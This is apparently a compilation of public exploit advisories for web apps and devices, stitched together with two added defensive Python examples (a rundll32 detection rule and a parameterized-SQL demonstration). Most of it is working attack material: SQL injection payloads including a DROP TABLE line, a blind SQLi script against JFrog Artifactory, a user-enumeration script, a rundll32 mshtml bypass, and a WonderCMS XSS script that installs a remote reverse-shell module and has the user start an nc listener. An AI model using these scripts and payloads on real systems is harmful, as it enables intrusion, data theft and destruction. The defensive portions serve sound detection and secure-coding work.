C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Access is denied.

C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
We win!

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: February 18, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
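The defender-side takeaway from the advisory above is that a signature keyed on the exact "mshtml\..\mshtml\..\mshtml" path is brittle, because the middle path component is attacker-chosen. The following Python is an added example (not part of the advisory or of any Microsoft tooling) of a process-creation detection that keys on the stable parts of the pattern instead: rundll32 receiving a vbscript: or javascript: moniker that ends in "mshtml,RunHTMLApplication", with whatever sits in between treated as a wildcard. The regex, the severity logic and the pipe-delimited sample telemetry are all constructed for this example.

```python
"""Detection helper for rundll32 script-moniker launches (added example)."""
import re

# Matches rundll32 invocations that hand a vbscript:/javascript: moniker to
# mshtml's RunHTMLApplication export. The path between the moniker and
# "mshtml,RunHTMLApplication" is deliberately a wildcard, so inserting an
# arbitrary directory name (the trick the advisory describes) does not
# defeat the match. Constructed for this example, not a vendor signature.
RUNDLL32_SCRIPT_MONIKER = re.compile(
    r"rundll32(?:\.exe)?\s+"            # the LOLBin itself
    r"[\"']?(?:vbscript|javascript):"   # script moniker (either engine)
    r".*?mshtml"                        # any path junk, then the mshtml target
    r"\s*,\s*RunHTMLApplication",       # the export that evaluates the script
    re.IGNORECASE,
)

# Secondary indicators worth surfacing in an alert; any one of them raises severity.
SUSPICIOUS_TOKENS = ("CreateObject(", "Wscript.Shell", "ActiveXObject(", ".Run(")


def classify_command_line(cmdline: str) -> dict:
    """Return a verdict for one process-creation command line.

    matched  - True when the rundll32 script-moniker pattern is present
    severity - 'high' when a shell/COM object is also spawned, else 'medium'
    tokens   - which secondary indicators were seen (case-insensitive)
    """
    matched = RUNDLL32_SCRIPT_MONIKER.search(cmdline) is not None
    lowered = cmdline.lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]
    severity = "none"
    if matched:
        severity = "high" if tokens else "medium"
    return {"matched": matched, "severity": severity, "tokens": tokens}


def scan_process_log(lines):
    """Run the classifier over constructed 'pid|image|cmdline' log lines."""
    hits = []
    for line in lines:
        pid, image, cmdline = line.split("|", 2)
        verdict = classify_command_line(cmdline)
        if verdict["matched"]:
            hits.append({"pid": int(pid), "image": image, **verdict})
    return hits


# Constructed sample telemetry (Sysmon-style event 1 fields, simplified).
# Lines 1-2 reproduce the advisory's command lines; 3-5 are made up here.
SAMPLE_LOG = [
    '4120|C:\\Windows\\System32\\rundll32.exe|rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)',
    '4188|C:\\Windows\\System32\\rundll32.exe|rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)',
    '4201|C:\\Windows\\System32\\rundll32.exe|rundll32 javascript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication ";alert(1)',
    '4250|C:\\Windows\\System32\\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    '4310|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt',
]

if __name__ == "__main__":
    for hit in scan_process_log(SAMPLE_LOG):
        print(hit)
```

Both the blocked and the "We win!" variants from the advisory hit the same rule, while an ordinary rundll32 use of shell32.dll does not; the legitimate Control Panel launch is the false-positive check worth keeping in any test set for this rule.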
-
Employee Management System v1 - 'email' SQL Injection
# Exploit Title: Employee Management System v1 - 'email' SQL Injection
# Google Dork: N/A
# Application: Employee Management System
# Date: 19.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: N/A
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A

## Vulnerability Description:
In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):
An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'

As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:
====================================================
employee/Admin/login.php

<?php
session_start();
error_reporting(1);
include('../connect.php');

//Get website details
$sql_website = "select * from website_setting";
$result_website = $conn->query($sql_website);
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){
    //Get Date
    date_default_timezone_set('Africa/Lagos');
    $current_date = date('Y-m-d h:i:s');

    $email = $_POST['txtemail'];
    $password = $_POST['txtpassword'];
    $status = 'Active';

    $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."' and status = '".$status."'";
    $result = mysqli_query($conn, $sql);

    if (mysqli_num_rows($result) > 0) {
        // output data of each row
        ($row = mysqli_fetch_assoc($result));
        $_SESSION["email"] = $row['email'];
        $_SESSION["password"] = $row['password'];
        $_SESSION["phone"] = $row['phone'];
        $firstname = $row['firstname'];
        $_SESSION["firstname"] = $row['firstname'];
        $fa = $row['2FA'];
    }
-
SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897

import requests
import sys


def print_help():
    print("Usage: python script.py [URL] [UserListFile]")
    sys.exit(1)


def main():
    if len(sys.argv) != 3 or sys.argv[1] == '-h':
        print_help()

    url, user_list_file = sys.argv[1], sys.argv[2]

    try:
        with open(user_list_file, 'r') as file:
            users = file.read().splitlines()
    except FileNotFoundError:
        print(f"User list file '{user_list_file}' not found.")
        sys.exit(1)

    valid_users = []
    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
    enumerate_txt = "This User ID/Email ID is not registered."

    for index, user in enumerate(users):
        progress = (index + 1) / len(users) * 100
        print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")

        data = {"UserId": user}
        response = requests.post(
            f"{url}{bypass_dir}",
            json=data,
            headers={"Content-Type": "application/json; charset=utf-8"}
        )

        if response.status_code == 200:
            response_data = response.json()
            if enumerate_txt not in response_data.get('d', {}).get('message', ''):
                valid_users.append(user)

    print("\nFinished processing users.")
    print(f"Valid Users Found: {len(valid_users)}")
    for user in valid_users:
        print(user)


if __name__ == "__main__":
    main()
-
Wondercms 4.3.2 - XSS to RCE
# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE

import sys
import requests
import os
import bs4

if (len(sys.argv)<4):
    print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
    data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
  url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
  if (xhr3.status == 200) {
    var xhr4 = new XMLHttpRequest();
    xhr4.withCredentials = true;
    xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
    xhr4.send();
    xhr4.onload = function() {
      if (xhr4.status == 200) {
        var ip = "'''+str(sys.argv[2])+'''";
        var port = "'''+str(sys.argv[3])+'''";
        var xhr5 = new XMLHttpRequest();
        xhr5.withCredentials = true;
        xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
        xhr5.send();
      }
    };
  }
};
'''
    try:
        open("xss.js","w").write(data)
        print("[+] xss.js is created")
        print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
        print("----------------------------\n")
        XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
        XSSlink = XSSlink.strip(" ")
        print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
        print("----------------------------\n")
        print("\nstarting HTTP server to allow the access to xss.js")
        os.system("python3 -m http.server\n")
    except:
        print(data,"\n","//write this to a file")
-
JFrog Artifactory < 7.25.4 - Blind SQL Injection
# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date:
# Exploit Author: ardr
# Vendor Homepage: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout, exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user. there must be populated data in the system. a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below

warnings.simplefilter('ignore', InsecureRequestWarning)
session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint
headers = {}
pos = 1
# cookies = Replace this with captured cookies from the above endpoint
cookies = {}
# version string is built one character at a time from the timing oracle
version = ""

while True:
    for i in string.digits + '.':
        data = {
            "after": "",
            "before": "",
            "direction": "asc",
            "name": "*",
            "num_of_rows": 100,
            "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)",
        }
        start = time.time()
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
    if len(version) >= 6:
        stdout.write("\n")
        print(f"Version found: MySQL {version}")
        exit(0)
-
WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)
# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
# Exploit Author: Sagar Banwa
# Date: 19/10/2023
# Vendor: https://webigniter.net/
# Software: https://webigniter.net/demo
# Reference: https://portswigger.net/web-security/cross-site-scripting
# Tested on: Windows 10/Kali Linux
# CVE : CVE-2023-46391

Stored Cross-site scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Steps-To-Reproduce:
1. Login to the Account
2. Go to the Categories.
3. Now add category > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php

Request

POST /cms/categories/add HTTP/2
Host: demo.webigniter.net
Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php
-
comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset
# Exploit Title: POC-CVE-2023-3244
# Date: 9/12/2023
# Exploit Author: Diaa Hanna
# Software Link: [download link if available]
# Version: <= 1.2.0 comments-like-dislike
# Tested on: 1.1.6 comments-like-dislike
# CVE : CVE-2023-3244

#References
#https://nvd.nist.gov/vuln/detail/CVE-2023-3244

#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).

import requests
import argparse
import sys
from colorama import Fore

parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244', description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
parser.add_argument('-u', '--username', help='username of a user on wordpress with low privileges', required=True)
parser.add_argument('-p', "--password", help='password of a user on wordpress with low privileges', required=True)
parser.add_argument('--url', help='the url of the vulnerable server (with http or https)', required=True)
parser.add_argument('--nossl', help='disable ssl verification', action='store_true', required=False, default=False)
args = parser.parse_args()

#check if the domain ends with a '/' if not then add it
url = args.url
if url[-1] != '/':
    url += '/'
wp_login = f'{url}wp-login.php'
wp_admin = f'{url}wp-admin/'
username = args.username
password = args.password
session = requests.Session()

#logging in
session.post(wp_login,
             headers={'Cookie': 'wordpress_test_cookie=WP Cookie check'},
             data={'log': username,
                   'pwd': password,
                   'wp-submit': 'Log In',
                   'redirect_to': wp_admin,
                   'testcookie': '1'},
             verify=not (args.nossl))

#if failed to login
if len(session.cookies.get_dict()) == 2:
    print(Fore.RED + "Error Logging In Check Your Username and Password And Try Again")
    sys.exit(1)

#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function
#the restore_settings function does not check the sufficient privileges of a logged-in user
#even a subscriber can use this POC
#(wp_admin already ends with '/', so no extra slash is added here)
response = session.get(f"{wp_admin}admin-ajax.php?action=cld_settings_restore_action", verify=not (args.nossl))
if response.text == "Settings restored successfully.Redirecting...":
    print(Fore.GREEN + "exploit executed successfully")
    print(Fore.YELLOW + "settings of the comments-like-dislike plugin should be defaulted on the server")
    sys.exit(0)
else:
    print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")
    sys.exit(1)
-
Simple Inventory Management System v1.0 - 'email' SQL Injection
# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
# Google Dork: N/A
# Application: Simple Inventory Management System
# Date: 26.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A

## Vulnerability Description:
This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.

## Proof of Concept (PoC):
An example attacker could input the following values:

email: [email protected]'%2b(select*from(select(sleep(20)))a)%2b'
pwd: test

This would result in the following SQL query:

SELECT * FROM users WHERE email = '[email protected]'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'

This attack would retrieve all users, making the login process always successful.

request-response photo: https://i.imgur.com/slkzYJt.png

## Vulnerable code section:
====================================================
ims/login.php

<?php
ob_start();
session_start();
include('inc/header.php');
$loginError = '';
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
    include 'Inventory.php';
    $inventory = new Inventory();
    // Vulnerable code
    $login = $inventory->login($_POST['email'], $_POST['pwd']);
    //
    if(!empty($login)) {
        $_SESSION['userid'] = $login[0]['userid'];
        $_SESSION['name'] = $login[0]['name'];
        header("Location:index.php");
    } else {
        $loginError = "Invalid email or password!";
    }
}
?>

## Reproduce:
https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html
-
taskhub 2.8.7 - SQL Injection
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /home/get_tasks_list

GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection

https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]

---
Parameter: project (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: status (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: user_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: sort (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=

Parameter: search (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---

[-] Done
-
Online Shopping System Advanced - Sql Injection
# Exploit Title: Online Shopping System Advanced
# Date: 07.12.2023
# Exploit Author: Furkan Gedik
# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Version: 1.0
# Tested on: [Kali Linux 2020.3]

# Description

Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database.

# PoC

[+] sqlmap output

sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql --technique=T --proxy=http://127.0.0.1:8080

Parameter: cm (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV

# Vulnerability

https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22

[+] payment_success.php

if (isset($_GET["st"])) {
    # code...
    $trx_id = $_GET["tx"];
    $p_st = $_GET["st"];
    $amt = $_GET["amt"];
    $cc = $_GET["cc"];
    $cm_user_id = $_GET["cm"];
    $c_amt = $_COOKIE["ta"];
    if ($p_st == "Completed") {
        include_once("db.php");
        $sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";
-
Flashcard Quiz App v1.0 - 'card' SQL Injection
# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
# Google Dork: N/A
# Application: Flashcard Quiz App
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A

## Vulnerability Description:
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.

## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.

1. Original Code:

$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

2. Payload:

' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --

3. Injected Query:

DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --

Request Response photo: https://i.imgur.com/5IXvpiZ.png

## Vulnerable code section:
====================================================
endpoint/delete-flashcard.php

$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
-
FAQ Management System v1.0 - 'faq' SQL Injection
# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
# Google Dork: N/A
# Application: FAQ Management System
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A

## Vulnerability Description:
The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.

## Proof of Concept (PoC):
An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:

1. Original Request:

http://example.com/endpoint/delete-faq.php?faq=123

2. Malicious Request (SQL Injection):

http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --

This would result in a query like:

DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --

Which can lead to the deletion of data or even the entire table.

PoC photo: https://i.imgur.com/1IENYFg.png

## Vulnerable code section:
====================================================
endpoint/delete-faq.php

$faq = $_GET['faq'];
// ...
$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
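The Employee Management System, Simple Inventory, Flashcard Quiz App and FAQ Management System advisories on this page all describe the same defect: a request value pasted into the SQL text. The Python below is an added example (not code from any of those projects) that shows the login and delete-by-id patterns side by side with their parameterized replacements, run against an in-memory sqlite3 database that stands in for the PHP/MySQL originals; the schema, rows and the `tbl_faq` naming are constructed for the example. It also records one caveat a tester should know: Python's sqlite3 refuses stacked statements like the "123'; DROP TABLE" payload, which hides the bug without fixing it, because a single-statement payload such as "' OR '1'='1" still deletes every row.

```python
"""Concatenated vs parameterized SQL, demonstrated on sqlite3 (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory schema shaped like the users / tbl_faq tables (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (email TEXT, password TEXT, status TEXT);
        INSERT INTO users VALUES ('admin@example.test', 'S3cret!', 'Active');
        INSERT INTO users VALUES ('old@example.test', 'x', 'Inactive');
        CREATE TABLE tbl_faq (tbl_faq_id INTEGER PRIMARY KEY, question TEXT);
        INSERT INTO tbl_faq VALUES (123, 'How do I reset my password?');
        INSERT INTO tbl_faq VALUES (124, 'Where is the office?');
        """
    )
    return conn


def login_concat(conn, email, password):
    """Vulnerable pattern from login.php: user input becomes part of the SQL text."""
    sql = ("SELECT * FROM users WHERE email='" + email +
           "' AND password='" + password + "' AND status='Active'")
    return conn.execute(sql).fetchall()


def login_param(conn, email, password):
    """Hardened form: placeholders, values travel separately from the statement."""
    sql = "SELECT * FROM users WHERE email=? AND password=? AND status='Active'"
    return conn.execute(sql, (email, password)).fetchall()


def delete_faq_concat(conn, faq_id):
    """Vulnerable pattern from delete-faq.php / delete-flashcard.php.

    Returns the number of rows deleted, or -1 when the driver refused the
    statement. sqlite3.execute() only runs one statement, so a stacked
    "'; DROP TABLE ..." payload is rejected here; that is a driver property,
    not a defence, and a single-statement payload still goes through.
    """
    try:
        cur = conn.execute("DELETE FROM tbl_faq WHERE tbl_faq_id = '" + faq_id + "'")
    except (sqlite3.Error, sqlite3.Warning):
        return -1
    return cur.rowcount


def delete_faq_param(conn, faq_id):
    """Hardened form: validate the type first, then bind the value."""
    if not faq_id.isdigit():
        return 0  # the app only ever sends an integer id; reject anything else
    cur = conn.execute("DELETE FROM tbl_faq WHERE tbl_faq_id = ?", (int(faq_id),))
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1' --"          # the login payload from the advisory
    print("concat login rows :", len(login_concat(db, bypass, "anything")))
    print("param  login rows :", len(login_param(db, bypass, "anything")))
    print("param  delete 123 :", delete_faq_param(db, "123"))
    print("param  delete OR  :", delete_faq_param(db, "' OR '1'='1"))
    print("concat stacked    :", delete_faq_concat(db, "123'; DROP TABLE tbl_faq; --"))
    print("concat delete OR  :", delete_faq_concat(db, "' OR '1'='1"))
```

Note that the concatenated login returns both users, including the Inactive one, because the "--" also comments out the status check; the parameterized query treats the whole payload as an email address and matches nothing. In the PHP originals the equivalent fix is a prepared statement (mysqli_prepare / PDO::prepare with bound parameters) plus an integer cast or validation on the id before it is bound.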
-
Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.wyrestorm.com

[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Account Enumeration

[CVE Reference]
CVE-2024-25734

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts; this can potentially allow for a brute force attack on a valid account.

[Exploit/POC]
TELNET x.x.x.x 23

username:aa
username:bb
username:admin
password:

[Network Access]
Remote

[Affected Product Code Base]
APOLLO VX20 - < 1.3.58, fixed in v1.3.58

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx